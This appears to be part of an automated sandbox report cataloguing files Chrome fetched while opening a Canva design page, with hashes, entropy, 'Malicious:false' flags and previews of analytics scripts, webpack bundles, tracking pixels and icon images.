                                                                Preview:.DF_utQ{cursor:auto;outline:none;position:absolute}.DF_utQ:hover{cursor:unset}.UYkI3g{will-change:transform}.Lj8ZqQ{display:none}._lzXBg{overflow:hidden}._0xkaeQ{pointer-events:auto}.eYn1AQ{overflow:hidden;pointer-events:none;position:absolute}.JpiJcw{pointer-events:auto}._3zDNwA{display:block;height:100%;left:0;position:absolute;top:0;width:100%}./*# sourceMappingURL=sourcemaps/fed228293e49d2e2.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (5945)
                                                                Category:dropped
                                                                Size (bytes):302724
                                                                Entropy (8bit):5.573266812183919
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0CAE469AE94570228DE326E6A48003C1
                                                                SHA1:28907497306BE54401D36910E2729DA9B3160467
                                                                SHA-256:B65D88078DAA49EB5889CACB98F083D44D21A1CB7C85650DBBDFE9F89EB82B98
                                                                SHA-512:67F34935D6703614D052404FA74BD61AF9B41D22BD8406E0610B07F91596FF760F94409763A631195287BAA81B886BE8BF7E32A8CACCBD982A46956C58937F5F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":13,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1285)
                                                                Category:dropped
                                                                Size (bytes):2659
                                                                Entropy (8bit):5.508173830849814
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BB59A198DA9F3C930958BEE24C9537DA
                                                                SHA1:2588757F4B37BD736AB02FEE0B4AAEF5BBCEB91B
                                                                SHA-256:4A6E349F67DF8A193972DF54B62DB91A01FE73A26510DE5E6974109009103617
                                                                SHA-512:BDBF9D182E95AB3860DD292F21AE8F857ECC1E487F8BF7554C1675EEF5B1990E06EC904DB1D03A247C128CFEDF1F7EB73FA5C7B202E3A0320EE4E3D2BE469AF5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2019494438;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;ps=1;pcor=548102288;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}..event: message.data: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2019494438;gtm=45j91e48l0v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromiu
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):65
                                                                Entropy (8bit):4.314128390879881
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:83A02FE42F8C2198E7C608AFF363AA49
                                                                SHA1:7B20AE1014450492CC708E3C9DC7522B05C2EFFD
                                                                SHA-256:E64954DC34E12C7190CC2338A54B07644FF0F102AA71CC7209BCBB49C3009F7C
                                                                SHA-512:CD381A8C725C892E9A68D713254A31EA9ED25A39B212A5DC52D4BA2655F38AFDDB32519F03360F32A59D8E7701AF6C2AD0030A6AA760C3DE87C75063F5B65F54
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:event: message.data: {"response":{"status_code":200,"body":""}}..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1192)
                                                                Category:dropped
                                                                Size (bytes):1550
                                                                Entropy (8bit):5.512335164870956
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:93E122F91443AEA1907DB44A19CBA6B9
                                                                SHA1:877499B714FB3E5A74E3B717FD8C3A5E6E754E20
                                                                SHA-256:264E46FF2D0BBFAEF03F34FD6EF28BFD4186ADA46EBF3C038ACC29D2A0040D55
                                                                SHA-512:FC16B5D574A75CA0B242B999E59C6C5C64F3675D827AD2AAA7F94A63E9C1951161723140536A1439CB6FCE16A407649BD690AEF2882BA8FA1FBE621447D37B95
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[815],{../***/ 642158:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {__c.Zg=function(a,b){const c=null!=b?a:0;return Array(Math.max(0,null!=b?Math.ceil(b-c):Math.floor(a))).fill(0).map((d,e)=>c+e)};__c.$g=function(a,b,c){c=!!c&&c.Zbb;const d=new Map;for(const e of a){a=b(e);if(c&&null==a)continue;const f=d.get(a);f?f.push(e):d.set(a,[e])}return d};__c.ah=function(a,b){return b?[...__c.$g(a,b).values()].map(c=>c[0]):[...(new Set(a))]};__c.bh=1;__c.dh=2;__c.eh=3;__c.fh=4;__c.gh=1;__c.hh=2;__c.ih=5;__c.jh=6;(function(a){a.ZQa=(b,c,d,e)=>{d/=e;return b+(c-b)*d*d};a.$Qa=(b,c,d,e)=>{d/=e;return b+(c-b)*d*(2-d)};a.Rkb=(b,c,d,e)=>{d/=e;return b+(c-b)*(.5>d?2*d*d:(4-2*d)*d-1)};a.tC=(b,c,d,e)=>b+d/e*(c-b);a.D5a=(b,c,d,e)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1722)
                                                                Category:dropped
                                                                Size (bytes):5717
                                                                Entropy (8bit):5.520945479013696
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:58AC86811CBC1EC225DCAAB45E6EBE7C
                                                                SHA1:CA2E36B238924A9B4C0A65F36F3F207C83DFD828
                                                                SHA-256:5FA56462D59F497E6C3A69CFA1B4F8A2A7102D03CAB8491E1B512A24DE596312
                                                                SHA-512:923883CAC3EF4E2377D54A6A8BF418003582271283974E076092E3F2F41047F5A3298E5AAD3CEA817C51C91B474D0CA66E80535E359991D55AD3E83316E0834E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6847],{../***/ 143286:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(695547);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Nqc=function({data:a,url:b}){try{const c=JSON.stringify(a,void 0,2);return{extra:new Map([["spans",c.slice(0,15500)],["url",b]]),tags:new Map([["telemetry.export.beacon.over_64_kB",String(64E3<c.length)]])}}catch(c){return{tags:new Map([["telemetry.error.serialisation_error","true"]])}}},Pqc=function(a,b){Oqc(a,b,()=>{const c=a.S8.get(b.context.spanId)||[];for(const d of c)Pqc(a,d)})},Oqc=function(a,b,c){var d,e=null!==(d=b.attrs.get("parent_relative_start_ms"))&&void 0!==d?d:b.duration;e="number"===.typeof e?` - ${Math.round(e)}ms`:"";d=null!=b.parentSpanId;var f=null!=b.attrs.get("user_operation_id");e=`${d?`${"event
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:C source, ASCII text, with very long lines (1309)
                                                                Category:dropped
                                                                Size (bytes):22382
                                                                Entropy (8bit):5.560668461772597
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D6E862C17654A86E346F0671B9457A26
                                                                SHA1:623297A278CD17B18568B922DCACFD536133377C
                                                                SHA-256:3A604B4AB4111BFEAB13EAE69B5D5D17A657D4CAF96C92D9F06E1267D2F2112C
                                                                SHA-512:91CE5FAE321E28FB4FED27482C224FC23203A7456531F2A9CBCF891C2CB2FF4B5F2462845244A5D52EA4741F2934F6490CBCF046C0697A827C9D0FB9F6F83D71
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5607],{../***/ 391214:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var NGa,MGa,PGa,QGa,fu,SGa,hu,UGa,iu,XGa,ku,lu,ZGa,cHa,nu,dHa;__c.bu=function(a){if(null==a||"object"!==typeof a)throw new TypeError(`expected an object, found: ${a}`);return a};__c.cu=function(a){return new Promise(b=>setTimeout(b,a))};__c.du=function(a,b){const c=[],d=[];let e=0;for(const f of a)b(f,e)?c.push(f):d.push(f),e++;return[c,d]};.NGa=function(a){if(!a.buffer.length){const b=c=>({background:c.background,text:c.oD?"rgb(13, 18, 22)":"rgb(255, 255, 255)",effect:c.effect,Io:c.Io||c.background});if(a.dRa){const [c,d]=a.Tua.reduce((e,f)=>{f.oD?e[1].push(b(f)):e[0].push(b(f));return e},[[],[]]);a.buffer=[...MGa(a,c),...MGa(a,d)]}else a.bu
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (62330), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):79075
                                                                Entropy (8bit):5.870737722635927
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0207F891B3E3451963C677172461D3D1
                                                                SHA1:72CE859A0D3F96F9FB44744031E46D55DBF37F4B
                                                                SHA-256:DAD7C7A4559822DC3B42D78BB52F1C4FBDB3A4A80375BCE8012CBA944D922064
                                                                SHA-512:A63E3724B82702AEC900E814A89E66434686D42BCF8E65E6E22F8F4471952F6F83D0768C7A500522003C5DB01A5D270BE78452B839E44C7793762E876CE3A391
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/f5c0f66c71c48e89.vendor.js
                                                                Preview:(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[477],{530750:function(t,n){!function(t){var n=Math;function r(t,n){for(var r,e,o,i="",c=n%26,u=0;u<t.length;u++)i+=(e=c,65<=(o=(r=t.charAt(u)).charCodeAt())&&o<=90?String.fromCharCode((o-65+e)%26+65):97<=o&&o<=122?String.fromCharCode((o-97+e)%26+97):32===o?String.fromCharCode(o+1):33===o?String.fromCharCode(o-1):r);return i}function e(t){var n,r={},e=t.split(""),o=e[0],i=[o],c=256,u=e[0],a=256;for(t=1;t<e.length;t++)n=(n=e[t].charCodeAt(0))<c?e[t]:r[n]||u+o,i.push(n),o=n.charAt(0),r[a]=u+o,a++,u=n;return i.join("")}var o=e("gbFgevat?pnyyre,nethzragf.bclSebzPunaary,trg...yQngn?.g.rdh.plErfcbafr..Vzn.....Y.r.fu,vfCb.gVaC........xr,.nfherGrkg,.nqe.vpP.i.b,sv...,f.b...s.g?.gC.c.gl.g....l..h.Lr..Ub.f.Z.hg.....Gv....m.rBss................rp.q..Z..F..........t,.WFBA.bYb........r................,i...?..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2312
                                                                Entropy (8bit):4.096788340259145
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9ABC2241BF1479263A0A039F3D1E5B5C
                                                                SHA1:A55CBCE3521486D4C9638602552F1DA877FB5411
                                                                SHA-256:0145274162A30A4AA4B234015B7FE608367D10F4A8042D30BA995A5ECF1FDCF7
                                                                SHA-512:0A5B51EEC0171CDDB3B5D9E7F7727D4509F33C63312136CD96A1E29BBC2FA35EFF341AEF41096809D482A16780CC376CAC488C3895E501A10C6FA66F6D8AEBD9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#EF9645" d="M32.302 24.347c-.695-1.01-.307-2.47-.48-4.082-.178-2.63-1.308-5.178-3.5-7.216l-7.466-6.942s-1.471-1.369-2.841.103c-1.368 1.471.104 2.84.104 2.84l3.154 2.934 2.734 2.542s-.685.736-3.711-2.078l-10.22-9.506s-1.473-1.368-2.842.104c-1.368 1.471.103 2.84.103 2.84l9.664 8.989c-.021-.02-.731.692-.744.68L5.917 5.938s-1.472-1.369-2.841.103c-1.369 1.472.103 2.84.103 2.84L13.52 18.5c.012.012-.654.764-.634.783l-8.92-8.298s-1.472-1.369-2.841.103c-1.369 1.472.103 2.841.103 2.841l9.484 8.82c.087.081-.5.908-.391 1.009l-6.834-6.356s-1.472-1.369-2.841.104c-1.369 1.472.103 2.841.103 2.841L11.896 30.71c1.861 1.731 3.772 2.607 6.076 2.928.469.065 1.069.065 1.315.096.777.098 1.459.374 2.372.934 1.175.72 2.938 1.02 3.951-.063l3.454-3.695 3.189-3.412c1.012-1.082.831-2.016.049-3.151z"/><path d="M1.956 35.026a.999.999 0 0 1-.707-1.707L4.8 29.77a.999.999 0 1 1 1.414 1.414l-3.551 3.55a.996.996 0 0 1-.707.292zm6.746.922a.999.999 0 0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1525
                                                                Entropy (8bit):4.359418865415674
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8777E8ED572C4159D71B08CCA2972B15
                                                                SHA1:2A57B1E6F2667BA1364CF459161FB868B53C37B8
                                                                SHA-256:E1795BC184F97F29790C807FC91C70846D221904576727698728271D7071F268
                                                                SHA-512:43276A2282A1B088AF417B61942B880253F9D1FCDFFF802F2EBD5BE935D4A708C2AA90842247147D5274CDE52D2B06B5659A607593925822539D6985AE84CFD0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><circle fill="#FFCB4C" cx="18" cy="17.018" r="17"/><path fill="#65471B" d="M14.524 21.036a.914.914 0 0 1-.312-.464.799.799 0 0 1 .59-1.021c4.528-1.021 7.577 1.363 7.706 1.465.384.306.459.845.173 1.205-.286.358-.828.401-1.211.097-.11-.084-2.523-1.923-6.182-1.098a.91.91 0 0 1-.764-.184z"/><ellipse fill="#65471B" cx="13.119" cy="11.174" rx="2.125" ry="2.656"/><ellipse fill="#65471B" cx="24.375" cy="12.236" rx="2.125" ry="2.656"/><path fill="#F19020" d="M17.276 35.149s1.265-.411 1.429-1.352c.173-.972-.624-1.167-.624-1.167s1.041-.208 1.172-1.376c.123-1.101-.861-1.363-.861-1.363s.97-.4 1.016-1.539c.038-.959-.995-1.428-.995-1.428s5.038-1.221 5.556-1.341c.516-.12 1.32-.615 1.069-1.694-.249-1.08-1.204-1.118-1.697-1.003-.494.115-6.744 1.566-8.9 2.068l-1.439.334c-.54.127-.785-.11-.404-.512.508-.536.833-1.129.946-2.113.119-1.035-.232-2.313-.433-2.809-.374-.921-1.005-1.649-1.734-1.899-1.137-.39-1.945.321-1.542 1.561.604 1.854.208 3.375-.83
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):19948
                                                                Entropy (8bit):5.261902742187293
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47331)
                                                                Category:dropped
                                                                Size (bytes):347640
                                                                Entropy (8bit):5.5435036804846725
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:09DBF8B7319DCFE681A19DCDE3E92C54
                                                                SHA1:7DEFE2FC24FF6788AEB147B7F17C195CF77BA237
                                                                SHA-256:14DF9C1D64CE6C6F74F4D1F01C78BB52D7255F134A59E88123ACF50D639BE69A
                                                                SHA-512:F5869F47249072C758FA61AF61C3A180A4CD4F136044B9989E823BDF284AD2F52431F0F4257019C12F07AE28F13B7C451BD3E27815523B7B539A524C55CFCA38
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"278",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2059)
                                                                Category:dropped
                                                                Size (bytes):761150
                                                                Entropy (8bit):5.590013944939536
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:086F5F662B444C97879C1F5EEC9ADA5E
                                                                SHA1:A7A1AEEBB3957B0BCCED6CD3248C435DB8E38733
                                                                SHA-256:975AE2C0C2A9837F23EA49C3FDD5BC67B7465E8DAE5C5DFAE9F9C9F804A908BF
                                                                SHA-512:F32DE213965F3726F8987FEA923428524619AF24B2B125833FEECD4B077C50C9808BF32F6FBDFA7335B6AF3E1175723723CE120F94755D9A277F75FD4AFF41F4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:;// __FILE_CONTENT_FOR__:b0b92895e784a4c7.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5837],{../***/ 46127:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(389580);__web_req__(642158);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var el=__c.el;var fl=__c.fl;var ol=__c.ol;var po;var lo;var ll=__c.ll;var Yk=__c.Yk;var Vk=__c.Vk;var ml=__c.ml;var gl=__c.gl;var pl=__c.pl;var nl=__c.nl;var kl=__c.kl;var hl=__c.hl;var Oi=__c.Oi;var tk=__c.tk;var jl=__c.jl;var Pi=__c.Pi;var Fi=__c.Fi;var cl=__c.cl;var dl=__c.dl;var Qk=__c.Qk;var Di=__c.Di;var Ej=__c.Ej;var Mi=__c.Mi;var Gi=__c.Gi;var Ni=__c.Ni;var Ki=__c.Ki;var Tk=__c.Tk;var Rk=__c.Rk;var Ei=__c.Ei;var Ci=__c.Ci;var Vh=__c.Vh;var Xh=__c.Xh;var zj=__c.zj;var Zj=__c.Zj;var yk=__c.yk;.var jn;var z=__c.z;var ba=__c.ba;var w=__c.w;var da=__c.da;va
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 157x199, components 3
                                                                Category:dropped
                                                                Size (bytes):7679
                                                                Entropy (8bit):7.51263729183507
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:576861157581B1CBC6C38A2DA17CEB90
                                                                SHA1:1AB1107B33AE66C409B11AD5659D499B62FFB7D6
                                                                SHA-256:AB24FBEFD1443FED4568CFAF6B8CDC81FD0D8ADDBF592AF2C7D727F8E9A377BB
                                                                SHA-512:4A7D7698234A0CF44425227A8CA0E164F4B31E2C4297F5D5725AED45C25733167C81AC5CBDB28B74A79D0A3D26E6A36400CBD3934990A2B307786FFCBC1DCCF3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=..U.xB...9.................................desc...D...ybXYZ........bTRC........dmdd........gXYZ...h....gTRC........lumi...|....meas.......$bkpt........rXYZ........rTRC........tech........vued........wtpt...p....cprt.......7chad.......,desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ......$.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|...............................................................%.+.2.8.>.E.L.R.Y.`.g.n.u.|.........................................&./.8.A.K.T.].g.q.z...............................!.-.8.C.O.Z.f.r.~......................... .-.;.H.U.c.q.~....................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47331)
                                                                Category:downloaded
                                                                Size (bytes):348759
                                                                Entropy (8bit):5.5428770605883795
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0BEA023B330F7F055678666A791B6B0B
                                                                SHA1:8035918F097935ADDC148CBD2D006A4C814775B3
                                                                SHA-256:0BD0983303BCC7C38FD43BA86F481113D76EEEAFA865B5506FC60FF8B00F3D54
                                                                SHA-512:F597AE35E523A3B0330C7EA849489233680067700F3FE90CBC85ABDAD3D89D593DAB429E31EA7FE4E5A9EC92C119090FA7B8FEFBB6447F0B0892573F8879D405
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.googletagmanager.com/gtm.js?id=GTM-TZPTKRR&l=dataLayer
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"278",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"label"},{"function":"__r"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"form_content"},{"function":"__c","vtp_value":"844585682227065"},{"function":"__cvt_12729902_717"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product_variant"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":fa
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                Category:downloaded
                                                                Size (bytes):43
                                                                Entropy (8bit):3.366634665454505
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BFF56CE49DD485D195FDFA0A02342568
                                                                SHA1:74FB4071DEAB7D3AB083562067B735DF32C43397
                                                                SHA-256:0E4B1E428A2198EF747010C094101C257B568A97CDCC0F31ED5E9868CC835B39
                                                                SHA-512:15BC2B5B57144C4F71DC203E16B0F7235EC5E659532D5BAFFD3E91D57CEC61D36CA1B7EA28156AB11A3FA46982FE252A58410D7ADF6693C93EDCCA2B2FA1ABB8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://sp.analytics.yahoo.com/spp.pl?a=10000&.yp=10137834&gtmcb=1059510276
                                                                Preview:GIF89a.............!.......,...........D..;
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):368
                                                                Entropy (8bit):4.546742488437108
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0483F2B648DCC986D01385062052AE1C
                                                                SHA1:61BD815F1497863265A76D92623042835E5E7FE2
                                                                SHA-256:09A743EE0C32CA57C9BE64B13B29C396310D1DD309CB4D7D3BE722E47DB95F27
                                                                SHA-512:359F9BCC2441DC48FFBE69353BB7D4143A2037B0263BD5F0CFB06B14D5F15D9A6E574930E88A84081C61698BF3E2F5333BF9081865183AA7F9202AAC078C10FF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/images/0483f2b648dcc986d01385062052ae1c.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#DD2E44" d="M35.885 11.833c0-5.45-4.418-9.868-9.867-9.868-3.308 0-6.227 1.633-8.018 4.129-1.791-2.496-4.71-4.129-8.017-4.129-5.45 0-9.868 4.417-9.868 9.868 0 .772.098 1.52.266 2.241C1.751 22.587 11.216 31.568 18 34.034c6.783-2.466 16.249-11.447 17.617-19.959.17-.721.268-1.469.268-2.242z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 629x799, components 3
                                                                Category:dropped
                                                                Size (bytes):28485
                                                                Entropy (8bit):7.922914638467208
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9FC8A5C1439231ABAECFE73C7983A15E
                                                                SHA1:F29373028F126D7A68ACAB454BD81B769106C750
                                                                SHA-256:004A964B13C40E95418C401736204DFBFA719EC5B0E44A7405CF112643DBC559
